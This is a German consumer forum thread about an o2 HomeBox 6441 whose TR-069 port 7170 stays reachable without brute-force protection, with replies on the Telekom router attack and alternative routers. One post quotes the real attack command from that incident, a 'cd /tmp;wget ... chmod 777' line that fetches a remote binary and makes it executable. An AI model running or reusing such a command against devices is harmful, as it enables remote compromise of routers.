Skip to main content
Hallo Zusammen,



Hardware: o2 HomeBox 6441



Firmware: 1.01.30V



Leitung: VDSL



habe gerade nicht schlecht gestaunt, als ich trotz Einstellung unter System -> Fernwartung : "Servicezugang gesperrt / Gerätekonfiguration über WAN gesperrt" feststellen mußte das:



Der TR069 Port 7170 SPERRANGELWEIT OFFEN ist. Das heißt das sich jeder mit einem standard Browser unter Eingabe (m)einer IP:7170 problemfrei auf meinem "Router" anmelden könnte, so er Benutzername und Passwort kennt.



Es wird noch lustiger:



Ja, das ist der Service der gegenwärtig unter erhöhtem Angriff steht, genau der der als Sideeffect  die paar Tausend Telekom Router lahmgelegt hatte.



Und ja, der wurde im Heise Security Check als bedenklich eingestuft.



Und, noch lustiger: Nein, dieser Zugang hat KEINE BRUTFORCE PROTECTION, bedeutet, ich kann so oft wie ich lust habe User/Passwort Kombinationen eingeben, ohne dabei Zeitlich limitiert zu werden.



Ich kann mir kaum vorstellen das nur ich davon betroffen bin, deshalb schleicht sich das etwas irritierende Gefühl ein, das da einer einfach mal den O2 Adressraum nach *:7170 antworten absucht, und dann mal lustige Wörterbuchspielchen treibt.



Ganz abgesehen davon, das ich nicht weiß ob diese durch die telekom letzte Woche berühmt gewordene Vulnarability mit dem NTP Server wget hier auch greift.



Ähh...Hallo ? (-:



ps: Geil übrigens wieder, der erste Bearbeiter in der Hotline, den ich hierzu wirklich freundlich interessiert befragen wollte, hat dann einfach aufgelegt :-)



Ich habe meine Fritzbox 7490 bei Heise getestet und die ist nicht angreifbar.



Wenn einen das sorgt, Geld in die Hand nehmen, den Cybersicherheit mache ich nicht vom Goodwil eines Anbieters abhängig.



Hacker-Angriff auf Telekom-Router: Kommentar zur Cyber-Attacke 




Vermutlich kommt wegen der Billig-Router-Schwäche auch eine Warnung von AVAST.



Könnte aber auch sein, das die Firmware des Routers veraltet ist. Bist Du sicher das die auf 30v endet?




Ja, absolut sicher.



Glücklicherweise setzt sich der Zugang scheinbar nicht aus dem generierbaren Service Zugang Namen und Passwort zusammen, sonst wäre die Hürde des Benutzernamens auch schon genommen, und nur noch ein 8 stelliges Passwort im Weg.



Lustige Sache, gerade weil ich ja gegenwärtig keine DMZ mehr nutzen kann, wegen der vermuteten One-Session only (Tkom Bitstream) VDSL Leitung. Und dann sowas :-)



Ich glaub ich muß da noch Heute irgend ein VDSL fähigen TP-Link mit OpenWRT dranhängen...Oder ich lass einfach auch gleich die Wohnungstür auf, dann paßt digital wenigstens zu physisch :-)




kannst Du den Report vom Heise-Test hier reinstellen? Würde mich mal interessieren.




TR-069 lässt sich bei der O2 Homebox generell nicht abschalten, da es zwingend für die Fernkonfiguration benötigt wird. Von der "NTP Server wget" Schwachstelle sollte die Homebox 6441 nicht betroffen sein, da die Geräte von Arcadyan nicht mit Linux arbeiten.




Danke zuersteinmal für die brauchbaren Informationen!



Das/Wenn auf den Arcadyans tatsächlich kein GNU/Linux derivat rennt, wäre schonmal beruhigend,



obschon ja auch die Telekom Geräte nicht wegen dem Angriff selbst (`cd /tmp;wget https:///external-link.jspa?url=http%3A%2F%2Ftr069.pw/1;chmod 777 1;) , auch kein linux, sondern wegen einem korellierenden Bug in die Knie gegangen sind.



Unangenehm natürlich trotzdem noch, das da ein, von mir bisher nicht näher untersuchter, Webserver auf 7170 lauscht, der sicherlich auch so seine weiteren Schwächen haben wird...



Frage:

Ich würde ja noch die Fritzbox 7490 von O2 bekommen, im Rahmen des Treueprogramms. 

Da ich ja die Zugangsdaten jetzt habe (inkl. VoIP) würde ich lieber eigene Hardware einsetzen (OpenWRT) und den Wert der Fritzbox 79,90.-€ auf meine Rechnungen anrechen lassen.



Bin ich in der Hardwarewahl grundsätzlich frei, oder gibt es Restriktionen oder Empfehlungen ?



Vielen Dank (-:




Nichts genaues weiß man nicht. Zumindest für die kürzlich betroffenen älteren Speedports war vom RTOS Supertask! die Rede. Aber wenn man sich zum Vergleich mal die Firmwarepakete des neueren Speedport W724V Typ B von Arcadyan anschaut, fällt auf, dass die Größe deutlich kleiner ist als die vom Funktionsumfang identischen Geräte von Huawei (Typ A) und Sercomm (Typ C). Ich denke das spricht dafür, dass Arcadyan auch bei den neueren Geräten weiterhin kein "voluminöses" Linux einsetzt.



Du bist in der Hardwarewahl frei, sondern sie den technischen Anforderungen entspricht. Ich denke auf die gewünschte Gutschrift kannst du aber lange warten ;-)



Der Heise Netzwerkcheck zeigt für meine O2 Homebox 6641 (Zyxel VMG7947-B40A-DE01V3F, Firmware 1.00(AAJG.0)D9) übrigens an, das alles in Ordnung ist.




Bei Internet kannst Du alles einsetzen - egal ob Asus, TP-Link, Netgear, Vigor etc.



Für VoIP macht nur AVM Sinn als unabhängiger Boxenhersteller. Alles andere ist zu risikobehaftet. Du wirst mit Sicherheit nichts angerechnet bekommen, da das einfach nur ein Goodie ist für alte Stammkunden. Entweder das Goodie wird so genommen oder gar nichts. Gegen eine 7490 für lau kann man nichts haben. Notfalls nimmt man die als nachgeschaltete Box und verwirrt die Angreifer. Dann noch an ein VDSL-Modem ein Honeypot und fertig ... 😉




Zitat VoIP-Droide:



kannst Du den Report vom Heise-Test hier reinstellen? Würde mich mal interessieren.







Und das sieht dann so aus:







Ansonsten Danke für Eure Hinweise bezüglich der Hardware. (-:




Danke, interessant.



Werde mal nachfragen ob die Firmware aktuell ist.




da viele User hier im Forum die .23v als Firmware nennen, scheint 30v noch aktueller



oh oh




Deine Antwort